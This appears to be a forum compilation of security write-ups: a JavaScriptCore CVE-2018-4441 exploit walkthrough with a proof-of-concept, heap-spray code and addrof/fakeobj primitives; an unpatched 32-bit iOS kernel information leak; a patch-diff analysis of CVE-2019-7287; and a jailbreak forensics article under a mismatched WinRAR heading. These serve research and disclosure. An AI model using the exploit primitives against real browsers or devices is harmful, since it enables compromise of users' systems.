0x0000000100a61c4b JavaScriptCore`JSC::arrayProtoFuncSplice(JSC::ExecState*) + 4267 [...] To be more precise, the crash occurs in the following loop in JSArray::unshiftCountWithArrayStorage where it tries to clear (zero-initialize) the added vector’s elements: // [...] for (unsigned i = 0; i < count; i++) vector[i + startIndex].clear(); // [...] startIndex ($rdi) is 0xfffffff0, vector ($r13) points to 0x10000fe6a8 and the resulting offset leads to a non-writable address, hence the crash. PoC Analysis // [1] let arr = [1] // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6b0 // - Type: ArrayWithInt32 // - public length: 1 // - vector length: 1 Initially, create an array of type ArrayWithInt32. It can hold any kind of elements (such as objects or doubles) but it still doesn’t have an associated ArrayStorage or holes. The WebKit project gives a nice overview of the different array storage methods. In short, a JSArray without an ArrayStorage will have a butterfly structure of the following form: --==[[ JSArray (lldb) x/2gx -l1 0x107bb4340 0x107bb4340: 0x0108211500000062 <--- JSC::JSCell [*] 0x107bb4348: 0x00000010000fe6b0 <--- JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly +0 { 16} JSArray +0 { 16} JSC::JSNonFinalObject +0 { 16} JSC::JSObject [*] 01 08 21 15 00000062 +0 { 8} JSC::JSCell | | | | | +0 { 1} JSC::HeapCell | | | | +-------- +0 < 4> JSC::StructureID m_structureID; | | | +----------- +4 < 1> JSC::IndexingType m_indexingTypeAndMisc; | | +-------------- +5 < 1> JSC::JSType m_type; | +----------------- +6 < 1> JSC::TypeInfo::InlineTypeFlags m_flags; +-------------------- +7 < 1> JSC::CellState m_cellState; +8 < 8> JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly; +8 < 8> JSC::Butterfly * m_value; --==[[ Butterfly (lldb) x/2gx -l1 0x00000010000fe6b0-8 0x10000fe6a8: 0x0000000100000001 <--- JSC::IndexingHeader [*] 0x10000fe6b0: 0xffff000000000001 <--- arr[0] 0x10000fe6b8: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) [*] 00000001 00000001 | | | +-------- uint32_t JSC::IndexingHeader.u.lengths.publicLength +----------------- uint32_t JSC::IndexingHeader.u.lengths.vectorLength // [2] arr.length = 0x100000 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0x100000 // - vector length: 1 // - m_numValuesInVector: 1 Next, set its length to 0x100000 and transision the array to an ArrayWithArrayStorage. Actually, setting the length of an array to anything greater than or equal to MIN_SPARSE_ARRAY_INDEX would transform it to ArrayWithArrayStorage. Additionally, just notice how the butterfly of an array with ArrayStorage points to the ArrayStorage instead of the first index of the array. --==[[ Butterfly (lldb) x/5gx -l1 0x00000010000fe6e8-8 0x10000fe6e0: 0x0000000100100000 <--- JSC::IndexingHeader 0x10000fe6e8: 0x0000000000000000 \___ JSC::ArrayStorage [*] 0x10000fe6f0: 0x0000000100000000 / 0x10000fe6f8: 0xffff000000000001 <--- m_vector[0], arr[0] 0x10000fe700: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) +0 { 24} ArrayStorage [*] 0000000000000000 --- +0 < 8> JSC::WriteBarrier<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > m_sparseMap; 0000000100000000 +0 { 8} JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > | | +0 < 8> JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> >::StorageType m_cell; | +----------- +8 < 4> unsigned int m_indexBias; +------------------- +12 < 4> unsigned int m_numValuesInVector; +16 < 8> JSC::WriteBarrier<JSC::Unknown, WTF::DumbValueTraits<JSC::Unknown> > [1] m_vector; // [3] arr.splice(0, 0x11) // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffef // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 JavaScriptCore implements splice using shift and unshift operations and decides between the two based on itemCount and actualDeleteCount. EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec) { // [...] unsigned actualStart = argumentClampedIndexFromStartOrEnd(exec, 0, length); // [...] unsigned actualDeleteCount = length - actualStart; if (exec->argumentCount() > 1) { double deleteCount = exec->uncheckedArgument(1).toInteger(exec); RETURN_IF_EXCEPTION(scope, encodedJSValue()); if (deleteCount < 0) actualDeleteCount = 0; else if (deleteCount > length - actualStart) actualDeleteCount = length - actualStart; else actualDeleteCount = static_cast<unsigned>(deleteCount); } // [...] unsigned itemCount = std::max<int>(exec->argumentCount() - 2, 0); if (itemCount < actualDeleteCount) { shift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length); RETURN_IF_EXCEPTION(scope, encodedJSValue()); } else if (itemCount > actualDeleteCount) { unshift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length); RETURN_IF_EXCEPTION(scope, encodedJSValue()); } // [...] } Thus, calling splice with itemCount < actualDeleteCount will eventually invoke JSArray::shiftCountWithArrayStorage. bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] // If the array contains holes or is otherwise in an abnormal state, // use the generic algorithm in ArrayPrototype. if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) || hasSparseMap() || shouldUseSlowPut(indexingType())) { return false; } // [...] storage->m_numValuesInVector -= count; // [...] } As it is also mentioned in the original bug report, assumming the array has neither indexed accessors nor any Proxy objects in the prototype chain, holesMustForwardToPrototype will return false and storage->m_numValuesInVector -= count will be called. In our case, count is equal to 0x11 and prior to the subtraction m_numValuesInVector is equal to 1, resulting in 0xfffffff0 as the final value. // [4] arr.length = 0xfffffff0 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffffff0 // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 At this point the value of m_numValuesInVector is under control. By setting the publicLength of the array to the value of m_numValuesInVector, hasHoles can be controlled as well. bool hasHoles() const { return m_numValuesInVector != length(); } It is worth mentioning that our control over m_numValuesInVector is very limited and is tightly related to the OOB read/write that will be discussed in more detail later. // [5] arr.splice(0xfffffff0, 0, 1) Finally splice is called with itemCount > actualDeleteCount in order to trigger unshift instead of shift. hasHoles returns false and we get OOB r/w in JSArray::unshiftCountWithArrayStorage. Exploitation Our plan is to leverage memmove in JSArray::unshiftCountWithArrayStorage into achieving addrof and fakeobj primitives. But before we do that, we have to set out an overall plan. There are three if-cases before the memmove call. bool JSArray::unshiftCountWithArrayStorage(ExecState* exec, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] bool moveFront = !startIndex || startIndex < length / 2; // [1] if (moveFront && storage->m_indexBias >= count) { Butterfly* newButterfly = storage->butterfly()->unshift(structure(vm), count); storage = newButterfly->arrayStorage(); storage->m_indexBias -= count; storage->setVectorLength(vectorLength + count); setButterfly(vm, newButterfly); // [2] } else if (!moveFront && vectorLength - length >= count) storage = storage->butterfly()->arrayStorage(); // [3] else if (unshiftCountSlowCase(locker, vm, deferGC, moveFront, count)) storage = arrayStorage(); else { throwOutOfMemoryError(exec, scope); return true; } WriteBarrier<Unknown>* vector = storage->m_vector; if (startIndex) { if (moveFront) // [4] memmove(vector, vector + count, startIndex * sizeof(JSValue)); else if (length - startIndex) // [5] memmove(vector + startIndex + count, vector + startIndex, (length - startIndex) * sizeof(JSValue)); } // [...] } Initially, we discarded case [1] and [3] since they’ll reallocate the current butterfly, leading to what we (wrongfully) assumed an unreliable memmove due to the fact that we can’t predict (turns out we can) where will the newly allocated butterfly land. With that in mind, we moved on with [2], but quickly stumbled upon a dead-end. If we were to take that route, we’d have to make moveFront false. To do that, startIndex has to be non-zero and greater than or equal to length/2. This ends up being a bummer because [4] will copy at least length/2 * 8 bytes. That’s a pretty gigantic number if you recall how we got to that code path in the first place. To cut to the chase, right after the memmove call we got a crash. We didn’t investigate the root cause any further, but since we memmove a big amount of memory, we believe some objects/structures adjacent to the butterfly are corrupted. Maybe by spraying a bunch of 0x100000 size JSArrays you could get around that, maybe not. We thought it was too dirty and abandoned the idea. Spray to slay At that point, we decided to browse through older exploits. niklasb came to the rescue with his exploit. In short, his code makes holes of certain size objects in the heap and reliably allocates them back. That felt ideal for [1] and [3]. Here’s how we adapted that approach to meet our exploitation criteria: let SPRAY_SIZE = 0x3000; // [a] let spray = new Array(SPRAY_SIZE); // [b] for (let i = 0; i < 0x3000; i += 3) { // ArrayWithDouble, will allocate 0x60, will be free'd spray[i] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i]; // ArrayWithContiguous, will allocate 0x60, will be corrupted for fakeobj spray[i+1] = [{},{},{},{},{},{},{},{},{},{}]; // ArrayWithDouble, will allocate 0x60, will be corrupted for addrof spray[i+2] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i]; } // [c] for (let i = 0; i < 1000; i += 3) spray[i] = null; // [d] gc(); // [e] for (let i = 0; i < SPRAY_SIZE; i += 3) // corrupt butterfly's length field spray[i+1][0] = i2f(1337) What we’re practically doing is [a] create an array, root a bunch of arrays of certain size in it, [c] remove their references to them and finally [d] trigger gc, resulting to heap holes of that size. We use this logic in our exploit in order to get a reallocated butterfly literally next to a victim/sprayed object of ours that we wish to corrupt. In case you didn’t notice, each spray index is a JSArray of size 10. Why 10? After a couple of test runs, while debugging all the way to the butterfly allocation in Butterfly::tryCreateUninitialized, we ended up with arr.splice(1000, 1, 1, 1). We noticed that the reallocated size will be 0x58 (rounded up to 0x60). This is the exact size of a JSArray whose butterfly holds 10 elements. Let’s visualize how does that spray look like in memory. ... +0x0000: 0x0000000d0000000a ----------+ +0x0000: 0x402abd70a3d70a3d | +0x0008: 0x402abd70a3d70a3d | +0x0010: 0x402abd70a3d70a3d | +0x0018: 0x402abd70a3d70a3d | +0x0020: 0x402abd70a3d70a3d spray[i], ArrayWithDouble +0x0028: 0x402abd70a3d70a3d | +0x0030: 0x402abd70a3d70a3d | +0x0038: 0x402abd70a3d70a3d | +0x0040: 0x402abd70a3d70a3d | +0x0048: 0x402abd70a3d70a3d ----------+ ... +0x0068: 0x0000000d0000000a ----------+ +0x0070: 0x00007fffaf7c83c0 | +0x0078: 0x00007fffaf7b0080 | +0x0080: 0x00007fffaf7b00c0 | +0x0088: 0x00007fffaf7b0100 | +0x0090: 0x00007fffaf7b0140 spray[i+1], ArrayWithContiguous +0x0098: 0x00007fffaf7b0180 | +0x00a0: 0x00007fffaf7b01c0 | +0x00a8: 0x00007fffaf7b0200 | +0x00b0: 0x00007fffaf7b0240 | +0x00b8: 0x00007fffaf7b0280 ----------+ ... +0x00d8: 0x0000000d0000000a ----------+ +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x402abd70a3d70a3d | +0x00f0: 0x402abd70a3d70a3d | +0x00f8: 0x402abd70a3d70a3d | +0x0100: 0x402abd70a3d70a3d spray[i+2], ArrayWithDouble +0x0108: 0x402abd70a3d70a3d | +0x0110: 0x402abd70a3d70a3d | +0x0118: 0x402abd70a3d70a3d | +0x0120: 0x402abd70a3d70a3d | +0x0128: 0x402abd70a3d70a3d ----------+ ... The goal of [c] and [d] is to land a reallocated butterfly at spray. Note we have control of both startIndex and count. startIndex represents the index where we want to start adding/deleting elements and count represents the actual number of added elements. For instance, arr.splice(1000, 1, 1, 1) gives a startIndex of 1000 and a count of 1 (if you think about it, we delete 1 element and add [1,1], essentially adding one element). Indeed, it’d be quite convenient if we landed that idea. In particular, with those numbers at hand, the memmove call at [4] translates to this: // [...] WriteBarrier<Unknown>* vector = storage->m_vector; if (1000) { if (1) memmove(vector, vector + 1, 1000 * sizeof(JSValue)); } // [...] Essentially, we’ll be moving memory “backwards”. For example, assuming Butterfly::tryCreateUninitialized returns spray[6], then you can think of [4] as: for (j = 0; j < startIndex; i++) spray[6][j] = spray[6][j+1]; This is how we’ll overwrite the length header field of the adjacent array’s butterfly, leading to an OOB and finally to a sweet addrof/fakeobj primitive. This is how the memory looks like right before [4]: ... +0x0000: 0x00000000badbeef0 <--- vector +0x0008: 0x0000000000000000 +0x0010: 0x00000000badbeef0 +0x0018: 0x00000000badbeef0 +0x0020: 0x00000000badbeef0 |vectlen| |publen| +0x0028: 0x0000000d0000000a ---------+ +0x0030: 0x0001000000000539 | +0x0038: 0x00007fffaf734dc0 | +0x0040: 0x00007fffaf734e00 | +0x0048: 0x00007fffaf734e40 | +0x0050: 0x00007fffaf734e80 spray[688] +0x0058: 0x00007fffaf734ec0 | +0x0060: 0x00007fffaf734f00 | +0x0068: 0x00007fffaf734f40 | +0x0070: 0x00007fffaf734f80 | +0x0078: 0x00007fffaf734fc0 ---------+ ... +0x0098: 0x0000000d0000000a ---------+ +0x00a0: 0x402abd70a3d70a3d | +0x00a8: 0x402abd70a3d70a3d | +0x00b0: 0x402abd70a3d70a3d | +0x00b8: 0x402abd70a3d70a3d | +0x00c0: 0x402abd70a3d70a3d spray[689] +0x00c8: 0x402abd70a3d70a3d | +0x00d0: 0x402abd70a3d70a3d | +0x00d8: 0x402abd70a3d70a3d | +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x4085e2f5c28f5c29 ---------+ ... And here’s the aftermath. Pay close attention to spray[688]’s vectorLength and publicLength fields: ... +0x0020: 0x0000000d0000000a |vectlen| |publen| +0x0028: 0x0001000000000539 --------+ +0x0030: 0x00007fffaf734dc0 | +0x0038: 0x00007fffaf734e00 | +0x0040: 0x00007fffaf734e40 | +0x0048: 0x00007fffaf734e80 | +0x0050: 0x00007fffaf734ec0 spray[688] +0x0058: 0x00007fffaf734f00 | +0x0060: 0x00007fffaf734f40 | +0x0068: 0x00007fffaf734f80 | +0x0070: 0x00007fffaf734fc0 | +0x0078: 0x0000000000000000 --------+ ... We’ve successfully overwritten spray[688]’s length. It’s pretty much game over. addrof and fakeobj let oob_boxed = spray[688]; // ArrayWithContiguous let oob_unboxed = spray[689]; // ArrayWithDouble let stage1 = { addrof: function(obj) { oob_boxed[14] = obj; return f2i(oob_unboxed[0]); }, fakeobj: function(addr) { oob_unboxed[0] = i2f(addr); return oob_boxed[14]; }, test: function() { var addr = this.addrof({a: 0x1337}); var x = this.fakeobj(addr); if (x.a != 0x1337) { fail(1); } print('[+] Got addrof and fakeobj primitives \\o/'); } } We’ll use oob_boxed, whose length we overwrote, to write an object’s address inside oob_unboxed, in order to construct our addrof primitive and lastly use oob_unboxed to place arbitrary addresses in it and be able to interpret them as objects via oob_boxed. The rest of the exploit is plug n’ play code used in almost every exploit; Spraying structures and using named properties for arbitrary read/write. w00dl3cs has done a great job explaining that part here so we’ll leave it at that. Conclusion CVE-2018-4441 was fixed in commit 51a62eb53815863a1bd2dd946d12f383e8695db0. We’ll release our exploit shortly after we clean it up a bit. If you have any questions/suggestions, feel free to contact us on twitter. References Attacking JavaScript Engines instanceof exploit write-up by w00dl3cs array overflow exploit by niklasb Sursa: https://melligra.fun/webkit/2019/02/15/cve-2018-4441/
-
iOS kernel.backtrace Information Leak Vulnerability Posted: 2019-02-22 09:00 by Stefan Esser | More posts about Blog iOS Kernel Informationleak Vulnerability Intro In our iOS Kernel Internals for Security Researchers training at offensive_con we let our trainees look at some code that Apple introduced to the kernel in iOS 10. This code implements a new sysctl handler for the kernel.backtrace sysctl. This sysctl is meant to retrieve the current thread's user level backtrace. The idea behind this exercise is to see if the trainees can spot a 0-day information leak vulnerability in the iOS kernel if they are already pointed into the right direction. kernel.backtrace The kernel.backtrace is a relatively new addition to the iOS kernel that let's the current process retrieve its own user level backtrace. While the logic of determining the user level's backtrace is somewhere buried in the Mach part of the kernel source code the sysctl handler itself is implemented in the file /bsd/kern/kern_backtrace.c. The code for the handler is shown below. 48 static int 49 backtrace_sysctl SYSCTL_HANDLER_ARGS 50 { 51 #pragma unused(oidp, arg2) 52 uintptr_t *bt; 53 uint32_t bt_len, bt_filled; 54 uintptr_t type = (uintptr_t)arg1; 55 bool user_64; 56 int err = 0; 57 58 if (type != BACKTRACE_USER) { 59 return EINVAL; 60 } 61 62 if (req->oldptr == USER_ADDR_NULL || req->oldlen == 0) { 63 return EFAULT; 64 } 65 66 bt_len = req->oldlen > MAX_BACKTRACE ? MAX_BACKTRACE : req->oldlen; 67 bt = kalloc(sizeof(uintptr_t) * bt_len); 68 if (!bt) { 69 return ENOBUFS; 70 } 71 72 err = backtrace_user(bt, bt_len, &bt_filled, &user_64); 73 if (err) { 74 goto out; 75 } 76 77 err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t)); 78 if (err) { 79 goto out; 80 } 81 req->oldidx = bt_filled; 82 83 out: 84 kfree(bt, sizeof(uintptr_t) * bt_len); 85 return err; 86 } The code above will first validated the incoming arguments and limit the depth of the backtrace that can be retrieved (lines 58-66). It will then allocated a heap buffer to store a backtrace of the user selected depth in line 67 and use an external helper function to fill the buffer with the user level backtrace (line 72). The actually retrieved backtrace is then copied to user land (line 77) and the heap buffer is released (line 84). The Vulnerability Before reading on further I suggest that you take a look at the code above again and try to spot the vulnerability yourself without help. Only one hint should be given: the vulnerability can only be exploited in older iOS/watchOS/tvOS devices. Please do not read further before you have given yourself a chance to spot the vulnerability. I am serious! Please try to first spot the vulnerability yourself. The fact that you are reading this means you either ignored the three warnings above or you have already looked at the code yourself and either spotted the vulnerability or you have given up after a reasonable amount of time looking at the code. So let us figure out the problem together. Let us have a look at the line that copies the backtrace to user land. 77 err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t)); 78 if (err) { 79 goto out; 80 } As you can see the amount of bytes copied to user land is bt_filled * sizeof(uint64_t). This is the number of filled out backtrace entries times 8 bytes. And now let us have a look at how big the heap buffer is that we are dealing with. 67 bt = kalloc(sizeof(uintptr_t) * bt_len); 68 if (!bt) { 69 return ENOBUFS; 70 } We kann see here that the size of the heap buffer is determined by the formula sizeof(uintptr_t) \* bt_len. This is the number of maximally retrieved backtrace entries times the size of a pointer. And this is were our previous hint kicks in: The size of a pointer is only 8 on recent devices. Older iOS devices (iPhone 5c and below) and older Apple Watches (Series 3) are internally 32 bit devices and therefore have only 4 byte pointers. This means on these older devices the call to copyout() will allow to copy twice the size of bytes from the heap than the buffer size is. This is a classic heap buffer overread vulneability. The Impact As pointed out this is a 0-day kernel information leak vulnerability that has not been shared with Apple before now and therefore it is still unfixed in the kernel. However there are a number of mitigating factors: the vulnerability affects only 32 bit iOS devices - the only devices Apple still supports in current releases that are 32 bit are Apple Watch Series 3 and below the vulnerability can only be triggered outside of the app sandbox - so it can only be used as part as a vulnerability chain and not exploited directly from an app iOS 12 copyin/copyout Mitigation Starting with iOS 12 Apple has added a mitigation to the kernel that checks whenever copyin() or copyout() are executed if the kernel's heap buffer has the necessary size for the operation to continue. The kernel will panic if an attacker tries to read or write accross the boundary of a kernel zone heap element. However this mitigation does not stop an attacker from exploiting this vulnerability because Apple did not add this protection to 32 bit kernels. It is unknown if they simply forgot to protect their remaining 32 bit devices or if they simply do not care about them at all anymore. The Apple Security Bounty The value of this security vulnerability in the eyes of Apple's security bounty program is exactly 0 USD. There are three reasons for this: Apple only pays for vulnerabilities affecting the latest of their devices. It doesn't matter if they officially still support older devices by providing them updates. They will only pay if the bugs affect the recent devices. Apple does not pay for vulnerabilities that affect MacOS / tvOS / WatchOS. Only if iOS devices are affected they might pay. Apple does not pay for information leak vulnerabilities although many of their mitigations rely on kernel memory being kept confidential. Conclusion This vulnerability is one of those things that are hard to explain. It is in relatively new code, so we would assume that kernel developers these days should be careful when writing new code. So it is rather a mystery why for the allocation and for copying the data two different data types are used. It is furthermore hard to explain why a security review of the new kernel code that should happen everytime new code is added did not spot this. The use of two different data types for allocation and copying is pretty obvious and trainees at offensive_con that were just learning about the kernel were pretty fast in seeing the problem. Trainings If you are interested in this kind of content please consider signing up for one of our upcoming trainings. Stefan Esser Sursa: https://www.antid0te.com/blog/19-02-22-ios-kernel-backtrace-information-leak-vulnerability.html
-
Is CVE-2019-7287 hidden in ProvInfoIOKitUserClient? Posted: 2019-02-24 00:00 by Stefan Esser | More posts about Blog iOS Kernel CVE-2019-7287 ProvInfoIOKitUserClient ProvInfoIOKit Vulnerability Intro On February 8th 2019 Apple released the iOS 12.1.4 update that fixed a previously disclosed security vulnerability in Facetime group conferences that was heavily discussed in media the week before. However with the same update Apple fixed a number of other vulnerabilities as documented in the usual place. While it is not uncommon for Apple to fix multiple security problems with the same update a tweet from Google's project zero made the public aware that two of these vulnerabilitis were apparently found being exploited in the wild. Since then more than two weeks have passed and neither Google nor Apple have given out any details about this incident, which leaves the rest of the world in the dark about what exactly happened, how Google was able to catch a chain of iOS 0-day vulnerabilities in the wild and where exactly the vulnerabilities are located. As usual Apple security notes contain only very brief descriptions of what was fixed. So it is no surprise that all they disclose about these vulnerabilities is the following. Foundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7287: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero This information is very unsatisfying and therefore we decided to have a look into what was actually fixed. Because we usually concentrate on the iOS kernel we tried to figure out what vulnerability is hiding behind CVE-2019-7287 by binary diffing the iOS 12.1.3 and the iOS 12.1.4 kernels. Patch Analysis Analysing iOS security patches has become a lot easier since the last time an iOS malware has been caught in the wild. With the release of iOS 10 Apple started to ship the iOS kernel in the firmware in decrypted form to be more open. But then they recently decided with iOS 12 to back paddle on this openness by stripping all symbols from the shipped kernels. However due to a mistake they shipped a fully symbolized iOS 12 kernel during the development stages that was immediately uploaded to Hexray's Lumina service. Without symbols analysing patches becomes a bit more difficult however in this case the functions in question even have strings in them that point to the problem directly. Once you have extracted the two kernels from the firmware they can analysed for differences. We have used the open source binary diffing plugin Diaphora for IDA to perform this task. For our comparison we loaded the iOS 12.1.3 kernel into IDA, then waited for the autoanalysis to finish and then used Diaphora to dump the current IDA database into the SQLITE database format Diaphora uses. We repeated this process with the iOS 12.1.4 kernel and then told Diaphora to diff the two databases using its slow heuristics overnight. The result of this comparison showed only a very small amount of partially changed functions. When looking at these functions we believe the vulnerability is likely in the function ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment. The reason why we believe this is because Apple introduced a new size check in this function. Have a look at the previous version of the function. And now have a look at the fixed version in iOS 12.1.4. You can clearly see the newly introduced size check in the area marked as red with a clear error message attached to it. ProvInfoIOKitUserClient The IOKit objects ProvInfoIOKit and ProvInfoIOKitUserClient are implemented in a driver called com.apple.driver.ProvInfoIOKit. Connections to driver cannot be created from the normal container sandbox that iOS applications run in. This means there is likely a sandbox escape involved in the full iOS exploitation chain that Google found. Alternatively the exploit chain could exploit one of the daemons that have legitimate access to this driver. A check of the sandbox profiles as shipped with iOS 12 reveals that there are three daemon sandboxes that are allowed to access this driver. These daemon sandboxes are: findmydeviced mobileactivationd identityserviced Which route to this driver was taken by the original attackers we can only guess until Apple or Google finally decide to reveal this information to the public. All this assuming that our guess is right and the newly introduced size check is actually the fix for CVE-2019-7287. Having pinpointed the newly introduced size check in ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment the next step is to find out how this function can actually be called from the outside. As it turns out this function is directly exposed to userland via the externalMethod interface of the driver. A check of ProvInfoIOKitUserClient::getTargetAndMethodForIndex reveals that the driver offers 6 different external methods to userland. These methods are: ucGenerateSeed (obfuscated name: fpXqy2dxjQo7) ucGenerateInFieldSeed (obfuscated name: afpHseTGo8s) ucExchangeWithHoover (obfuscated name: AEWpRs) ucGetEntcryptedSeedSegment ucEncryptSUInfo ucEncryptWithWrapperKey The interesting thing here is that three first external methods have obfuscated names in the leaked symbols. However all six routines have very explicit strings in them that reveal their name. Checking into the other external methods we were in for a surprise. The Surprise When looking into ucEncryptSUInfo and ucEncryptWithWrapperKey we were surprised to see that both these functions have also been changed. Both have also gotten new size checks. And both these functions did not show up in our Diaphora output. At some point we may want to go back and try to figure out why Diaphora did not see these functions as changed (or maybe they changed too much so that the different functions were not matched). When you look at these functions and the introduced size checks you will also see that directly after the size check there are calls do memmove. When you look at the calls to memmove it seems that before the size checks were introduced the code fully trusted user supplied size fields in the incoming parameter structure. This likely lead to arbitrary sized heap memory corruptions. We will take a look into this in the next days to verify this educated guess. To be continued Our research and therefore this blog post is far from finished. We only wanted to get this information out as soon as possible in order to first verify that we have pinpointed the right location before we invest further resources into maybe chasing down the wrong bug. Please check back in a few days to see if we have updated this post. Trainings If you are interested in this kind of content please consider signing up for one of our upcoming trainings. Stefan Esser Sursa: https://www.antid0te.com/blog/19-02-23-ios-kernel-cve-2019-7287-memory-corruption-vulnerability.html
-
Extracting a 19 Year Old Code Execution from WinRAR The new generation of jailbreaks has arrived. Available for iOS 11 and iOS 12 (up to and including iOS 12.1.2), rootless jailbreaks offer significantly more forensically sound extraction compared to traditional jailbreaks. Learn how rootless jailbreaks are different to classic jailbreaks, why they are better for forensic extractions and what traces they leave behind. Privilege Escalation If you are follow our blog, you might have already seen articles on iOS jailbreaking. In case you didn’t, here are a few recent ones to get you started: Physical Extraction and File System Imaging of iOS 12 Devices Using iOS 11.2-11.3.1 Electra Jailbreak for iPhone Physical Acquisition iPhone Physical Acquisition: iOS 11.4 and 11.4.1 In addition, we published an article on technical and legal implications of iOS file system acquisition that’s totally worth reading. Starting with the iPhone 5s, Apple’s first iOS device featuring a 64-bit SoC and Secure Enclave to protect device data, the term “physical acquisition” has changed its meaning. In earlier (32-bit) devices, physical acquisition used to mean creating a bit-precise image of the user’s encrypted data partition. By extracting the encryption key, the tool performing physical acquisition was able to decrypt the content of the data partition. Secure Enclave locked us out. For 64-bit iOS devices, physical acquisition means file system imaging, a higher-level process compared to acquiring the data partition. In addition, iOS keychain can be obtained and extracted during the acquisition process. Low-level access to the file system requires elevated privileges. Depending on which tool or service you use, privilege escalation can be performed by directly exploiting a vulnerability in iOS to bypass system’s security measures. This is what tools such as GrayKey and services such as Cellebrite do. If you go this route, you have no control over which exploit is used. You won’t know exactly which data is being altered on the device during the extraction, and what kind of traces are left behind post extraction. In iOS Forensic Toolkit, we rely on public jailbreaks to circumvent iOS security measures. The use of public jailbreaks as opposed to closed-source exploits has its benefits and drawbacks. The obvious benefit is the lower cost of the entire solution and the fact you can choose the jailbreak to use. On the other hand, classic jailbreaks were leaving far too many traces, making them a bit overkill for the purpose of file system imaging. A classic jailbreak has to disable signature checks to allow running unsigned code. A classic jailbreak would include Cydia, a third-party app store that requires additional layers of development to work on jailbroken devices. In other words, classic jailbreaks such as Electra, Meridian or unc0ver carry too many extras that aren’t needed or wanted in the forensic world. There is another issue with classic jailbreaks. In order to gain superuser privileges, these jailbreaks remount the file system and modify the system partition. Even after you remove the jailbreak post extraction, the device you were investigating will never be the same. It may or may not take OTA iOS updates, and it may (and often will) become unstable in operation. A full system restore through iTunes followed by a factory reset are often required to bring the device back to norm. Rootless Jailbreak Explained With classic jailbreaks being what they are, we actively searched for a different solution. It was that moment the rootless jailbreak has arrived. Rootless jailbreaks have significantly smaller footprint compared to classic ones. While offering everything required for file system extraction (including SSH shell), they don’t bundle unwanted extras such as the Cydia store. Most importantly, rootless jailbreaks do not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak and return the system to clean pre-jailbroken state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. So how exactly a rootles jailbreak is different from full-root jailbreak? Let’s take a closer look. What is a regular jailbreak? A common definition of jailbreak is “privilege escalation for the purpose of removing software restrictions imposed by Apple”. In addition, “jailbreaking permits root access.” Root access means being able to read (and write) to the root of the file system. A full jailbreak grants access to “/” in order to give the user the ability to run unsigned software packages while bypassing Apple restrictions. Giving access to the root of the file system requires a file system remount. The jailbreak would then write some files to the system partition, thus modifying the device and effectively breaking OTA functionality. Why do classic jailbreaks need to write anything onto the system partition? The thing is, kppless jailbreaks cannot execute binaries in the user partition. Such attempts are errored with “Operation not permitted”. Obviously, apps installed from the App Store are located on the user partition and can run without a problem; the problem is getting unsigned binaries to run. The lazy way of achieving this task was putting binaries onto the system partition and going from there. What is rootless jailbreak then? “Rootless doesn’t mean without root, it means without ability to write in the root partition” (redmondpie). Just as the name implies, a rootless jailbreak does not grant access to the root of the file system (“/”). The lowest level to which access is provided is the /var directory. This is considered to be a lot safer as nothing can modify or change system files to cause unrepairable damage. Is It Safe? This is a valid question we’ve been asked a lot. If you read the Physical Extraction and File System Imaging of iOS 12 Devices, you could see that installing the rootless jailbreak involves using a third-party Web site. Exposing an iPhone being investigated to Internet connectivity can be risky, especially if you don’t have authority to make Apple block all remote lock/remote wipe requests originated via the Find My iPhone service. We are currently researching the possibility of installing the jailbreak offline. If you need full transparency and accountability, you can compile your own IPA file from source code: https://github.com/jakeajames/rootlessJB3 You will then have to sign the IPA file and sideload it onto the iOS device you’re about to extract, at which point the device will still have to verify the validity of the certificate by connecting to an Apple server. More information about the development of the rootless jailbreak can be found in the following write-up: How to make a jailbreak without a filesystem remount as r/w Rootless Jailbreak: Modified Data and Life Post Extraction The rootless jailbreak is available in source code. Because of this, one can analyze what data exactly is altered on the device. Knowing what is modified, experts can include this information in their reports. At very least, rootlessJB modifies the following data on the device: /var/containers/Bundle/Application/rootlessJB – the jailbreak itself /var/containers/Bundle/iosbinpack64 – additional binaries and utilities 